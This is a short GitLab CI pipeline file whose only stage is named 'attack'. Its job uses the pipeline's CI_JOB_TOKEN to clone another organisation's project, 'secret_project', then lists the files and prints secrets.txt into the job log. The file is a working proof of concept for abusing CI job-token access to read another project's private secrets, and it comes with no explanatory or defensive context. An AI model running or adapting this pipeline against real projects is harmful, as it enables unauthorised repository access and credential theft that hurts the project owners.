image: registry.gitlab.com/gitlab-org/terraform-images/stable:latest

stages:
  - attack

clone:
  stage: attack
  script:
    - cd ${CI_PROJECT_DIR}
    - git clone https://gitlab-ci-token:${CI_JOB_TOKEN}@gitlab.com/alice_org/secret_project.git
    - cd secret_project
    - ls -a
    - cat secrets.txt
